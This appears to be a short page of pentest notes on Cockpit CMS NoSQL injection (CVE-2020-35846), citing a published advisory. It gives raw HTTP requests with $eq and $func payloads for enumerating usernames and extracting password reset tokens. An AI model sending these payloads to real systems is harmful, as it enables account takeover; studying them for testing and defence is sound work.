Skip to content

Default credentials

Vulnerability

Source: https://swarm.ptsecurity.com/rce-cockpit-cms/

Extracting password reset tokens

Cockpit, like many other web applications, allows resetting account passwords.
We discovered two methods that are vulnerable to NoSQL injection and allow obtaining the password reset token for any user.

NoSQL injection in /auth/check (CVE-2020-35846)

Using the $eq operator

The $eq operator matches documents where the value of a field equals the specified value.

For example, you can use it to bruteforce names with a dictionary.

The condition is met: a user with the name admin has been found

1
2
3
4
5
6
7
POST /auth/check HTTP/1.1
Host: 192.168.199.10:9090
Content-Type: application/json; charset=UTF-8
Content-Length: 49
Origin: http://192.168.199.10:9090

{"auth":{"user":{"$eq":"admin"},"password":[0]} }

The condition is NOT met: no user with the name admini has been found

1
2
3
4
5
6
7
POST /auth/check HTTP/1.1
Host: 192.168.199.10:9090
Content-Type: application/json; charset=UTF-8
Content-Length: 49
Origin: http://192.168.199.10:9090

{"auth":{"user":{"$eq":"admin1"},"password":[0]} }

NoSQL injection in /auth/requestreset

[requestreset](https://github.com/agentejo/cockpit/blob/0.11.1/modules/Cockpit/Controller/Auth.php#L82) method of the Auth controller responsible for creating the password reset token:

1
2
3
4
5
6
7
POST /auth/requestreset HTTP/1.1
Host: 192.168.199.10:9090
Content-Type: application/json; charset=UTF-8
Content-Length: 29
Origin: http://192.168.199.10:9090

{"user":{"$func":"var_dump"} }
Last update: 2026-03-07
Created: March 7, 2026 21:02:17